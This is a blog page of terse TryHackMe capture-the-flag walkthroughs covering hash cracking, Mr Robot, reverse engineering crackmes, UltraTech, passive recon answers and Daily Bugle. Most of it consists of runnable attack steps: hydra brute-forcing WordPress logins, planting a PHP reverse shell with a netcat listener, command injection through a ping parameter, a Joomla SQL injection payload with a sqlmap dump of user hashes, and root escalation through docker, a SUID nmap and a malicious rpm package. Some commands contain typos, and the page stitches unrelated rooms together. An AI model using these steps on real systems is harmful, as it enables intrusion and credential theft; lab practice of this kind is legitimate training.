Crack The Hash TryHackMe Write-ups | THM Walkthroughs | LabViet

# tryhackme
TryHackMe Write-ups THM Walkthrough

$2y$12$Dwt1BZj6pcyc3Dy1FWZ5ieeUznr71EeNkJkUlypTsgbX1H68wsRom

Commands:

grep '^....$' /usr/share/wordlists/rockyou.txt > LabViet4.txt

hashcat -a 0 -m 3200 '$2y$12$Dwt1BZj6pcyc3Dy1FWZ5ieeUznr71EeNkJkUlypTsgbX1H68wsRom' LabViet4.txt

$6$aReallyHardSalt$6WKUTqzq.UQQmrm0p/T7MPpMbGNnzXPMAXi4bJMl9be.cfi3/qxIf.hsGpS41BqMhSrHVXgMpdjS6xeKZAs02.

Commands:

grep '^......$' /usr/share/wordlists/rockyou.txt > LabViet6.txt

hashcat -a 0 -m 1800 '$6$aReallyHardSalt$6WKUTqzq.UQQmrm0p/T7MPpMbGNnzXPMAXi4bJMl9be.cfi3/qxIf.hsGpS41BqMhSrHVXgMpdjS6xeKZAs02.' LabViet6.txt

e5d8870e5bdd26602cab8dbe07a942c8669e56d6:tryhackme

hashcat -a 0 -m 160 'e5d8870e5bdd26602cab8dbe07a942c8669e56d6:tryhackme' /usr/share/wordlists/rockyou.txt

-------------

**https://tryhackme.com/room/mrrobot**
**Copyright @ http://bloggeroffer.blogspot.com**

**Task 1**
S1.1
nmap -sC -sV -O [ip-address] -oN basic_scan.nmap

S1.2
nikto -h [ip-address]

or

gobuster dir -u http://[ip-address] -w /usr/share/wordlists/dirb/common.txt -o directories.txt

S1.3
With Firefox, open http://[ip-address]/robots.xml AND http://[ip-address]/key-1-of-3.txt -> Key 1
Or with Linux: curl -s http://[ip-address]/robots.txt AND curl -s http://[ip-address]/key-1-of-3.txt -> Key 1
http://[ip-address]/fsocity.dic -> Guess that's Users & Pws

Task 2
Method 1: 
curl -s http://[ip-address]/license | tr -d "\n" 
then 
echo "ZWxsaW90OkVSMjgtMDY1Mgo=" | base64 -d
or Decode on https://www.base64decode.org/

Method 2
S2.1: List Directories
gobuster dir -u [ip-address] -w /usr/share/dirbuster/directory-list-2.3-medium.txt -e

S2.2: Get File that we guess it's Us, pw
wget http://[ip-address]/fsocity.dic

S2.3: Guess username of Wordpress Login
hydra -L fsocity.dic.uniq -p nopass \
-s 80 1[ip-address] http-post-form -t 30 \
'/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:Invalid username' 

S2.4: Guess password of Wordpress Login
hydra -l Elliot -P fsocity.dic.uniq \
-s 80 [ip-address] http-post-form -t 30 \
'/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:The password you entered for the username'

Both S2.3, S2.4 can do with wpscan:
wpscan -u users.txt -p pw.txt --url http://[ip-address]/wp-admin

S2.5 Upload Revert Shell via 404.php
Download php revert shell: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
Change $ip= in that php file. Note: $ip = IP Address for Reverse Shell, not [ip-address]

S2.6 Use Netcat to open a listener
nc -nlvp 1234

S2.7 Open the reverse shell
http://[ip-address]/404.php

S2.8 Get Root pass
ls -l /home/robot/
cat password.raw-md5
Password is in MD5 hash, we can reverse on this site: https://md5.gromweb.com/?md5=c3fcd3d76192e4007dfb496cca67e13b or https://crackstation.net/

S2.9 Su - robot
Solve: su: must be run from a terminal
python -c 'import pty; pty.spawn("/bin/sh")'
After above command, we can Su - robot then 
Cat key-2-of-3.txt

Task 3
S3.1 Sudo -l
(robot: a->z)
Solve: Sorry, user robot may not run sudo on linux.
First, find all App run Owned by Root:
find / -user root -perm -4000 -print 2>/dev/null

Second, we found nmap can run as Root with this command:
ls -l /usr/local/bin/nmap

Final, nmap interactive:
nmap --interactive

!whoami
!ls /root
!cat /root/key-3-of-3.txt
https://tryhackme.com/room/reverselfiles
Task 1
file crackme1
chmod +x crackme1
./crackme1

Task 2
strings crackme2
./crackme2 super_secret_password

Task 3
strings crackme3
or
r2 -A crackme3
echo HashHere | base64 -d

Task 4
Method 1
r2 -A crackme4 pass
px @ rax

Method 2
strings crackme4

Use radare2
r2 -d ./crackme4 password

aa
afl | grep main
pdf @main
pdf @sym.compare_pwd
db 0x0040006cf
dc
px @ rbp-0x20

Task 5
strings crackme5
Method 1
r2 -A crackme5 
px @ rdx

Method 2
r2 -d ./crackme5 

pdf @main
pdf @sym.compare_pwd
db 0x004000829
db 0x004000834
dc
px @ rbp-0x30
px @ rbp-0x50

./crackme5
OfdlDSA|3tXb32~X3tX@sX`4tXtz

Task 6
chmod +x crackme6
Use Ghidra https://ghidra-sre.org/ as a Decompiler

Go to main function, it call compare_pwd

Looking at compate_pwd, Decompile my_secure_test.

We get 313333375f707764
Visit https://toolbox.googleapps.com/apps/encode_decode/

Then choose Hex Decode

Task 7
Run Ghidra, see main function, local 14 == 0x7a69. Use https://www.convzone.com/hex-to-decimal/ Convert this hex to dec is 31337.
./crackme7 31337

Task 8
Run Ghidra, see main function, iVar2 == -0x35010ff3. Use https://www.convzone.com/hex-to-decimal/ Convert this hex to dec is -889262067.
./crackme7 -889262067

UltraTech

nmap -sC -sV -p- 10.10.64.13

gobuster dir --url http://10.10.64.13 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 32

gobuster dir --url http://10.10.64.13:8081/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 32


gobuster dir --url http://10.10.64.13:31331/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 32

http://10.10.64.13:8081/ping?ip='cat utech.db.sqlite'

--or curl -i 'http://10.10.64.13:8081/ping?ip='cat%20utech.db.sqlite''

crackstation.net f357a0c52799563c7c7b76c1e7543a32
--or
hashcat -a 0 -m 0 f357a0c52799563c7c7b76c1e7543a32 /usr/share/wordlists/rockyou.txt --quiet

ssh r00t@10.10.131.120

id
docker images
docker run -v /:/mnt --rm -it bash chroot /mnt bash

whoami
ls -la /root

https://tryhackme.com/room/passiverecon
Task 2  Passive Versus Active Recon

1.Q

You visit the Facebook page of the target company, hoping to get some of their employee names. What kind of reconnaissance activity is this? (A for active, P for passive)

Ans: P

2.Q

You ping the IP address of the company webserver to check if ICMP traffic is blocked. What kind of reconnaissance activity is this? (A for active, P for passive)

Ans: A

3.Q

You happen to meet the IT administrator of the target company at a party. You try to use social engineering to get more information about their systems and network infrastructure. What kind of reconnaissance activity is this? (A for active, P for passive)

Ans: A

*Task 3  Whois

When was TryHackMe.com registered?

Ans:  20180705

2.Q

What is the registrar of TryHackMe.com?

Ans: namecheap.com

3.Q

Which company is TryHackMe.com using for name servers?

Ans: cloudflare.com

*Task 4  nslookup and dig

1.Q

Check the TXT records of thmlabs.com. What is the flag there
nslookup -type=MX tryhackme.com

Ans: THM{a5b83929888ed36acb0272971e43****}

*Task 5  DNSDumpster

Lookup tryhackme.com on DNSDumpster. What is one interesting subdomain that you would discover in addition to www and blog?

Ans: remote

*Task 6  Shodan.io

1.Q

According to Shodan.io, what is the 2nd country in the world in terms of the number of publicly accessible Apache servers?
Search query: Apache
Ans: Germany

2.Q

Based on Shodan.io, what is the 3rd most common port used for Apache?
Search query: Apache
Ans:  8080

3.Q

Based on Shodan.io, what is the 3rd most common port used for nginx?
Search query: nginx
Ans: 5051

https://tryhackme.com/room/dailybugle
nmap -sV -sc IP-address

Detect Joomla version:
http://IP-address/administrator/manifests/files/joomla.xml

searchsploit joomla 3.7.0
searchsploit -m php/webapps/42033.txt

http://IP-address/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)

sqlmap -u "http://IP-address/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

Us, pw:
sqlmap -u "http://IP-address/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomla -T "#__users" -C username,password -p list[fullordering] --dump

--Save hash
sudo nano VietKim.txt

Decode hash
john --wordlist=/usr/share/wordlists/rockyou.txt VietKim.txt

Login http://IP-address/administrator/index.php with above username, password

Click to Extensions–>Templates–>Templates
Select Protostar theme (in use)
index.php

Download Reverse Shell
https://raw.githubusercontent.com/jbarcia/Web-Shells/master/laudanum/php/php-reverse-shell.php

Paste content of the PHP reverse shell to the beginning of the index.php (Note to Change Revers IP, Port -> 443)

sudo nc -lvnp 443
python -c 'import pty; pty.spawn("/bin/sh")'
stty raw -echo
sudo nc -lvnp 443
cd /var/www/html
cat configuration.php

su jjameson
whoami
sudo -l
TF=$(mktemp -d)
echo 'id' > $TF/x.sh
fpm -n x -s dir -t rpm -a all -before-install $TF/x.sh $TF
ls -la x-1.0-1.noarch.rpm

wget http://IP-Reverse/x-1.0-1.noarch.rpm

sudo python -m http.server 80

sudo yum localinstall -y x-1.0-1.noarch.rpm

TF=$(mktemp -d)
echo 'cp /bin/bash /tmp/stef && chmod +s /tmp/stef' > $TF/x.sh
fpm -n a -s dir -t rpm -a all -before-install $TF/x.sh $TF
ls -la a-1.0-1.noarch.rpm

wget http://IP-Reverse/x-1.0-1.noarch.rpm

sudo python -m http.server 80

sudo yum localinstall -y a-1.0-1.noarch.rpm
ls -la /tmp/stef
/tmp/stef -p
whoami


๐Ÿ‘‡For any Query message me on Facebook๐Ÿ‘‡
Facebook Link :- https://FB.COM/K3Lvinmitnick

-----------------
Disclaimer: The content in this video is strictly for Education purposes only. Copyright Disclaimer Under Section 107 of the Copyright Act 1976, allowance is made for "fair use" for purposes such as criticism, comment, news reporting, teaching, scholarship, and research. This video is not forcing anything on you.
-----------------

๐Ÿ””๐Ÿ“ข Subscribe for more TIPs from VietKim → https://bit.ly/VietTube
๐ŸŒ Follow VietKim on https://FB.COM/K3Lvinmitnick
๐ŸŒ Visit https://bloggeroffer.blogspot.com/ to learn more ...

Comments

Popular Posts

Quick and Easy Fix for "The Password Does Not Meet Minimum Security Requirements" Error

Unlocking Hidden Bard Prompts: Mastering Google Gemini Hacks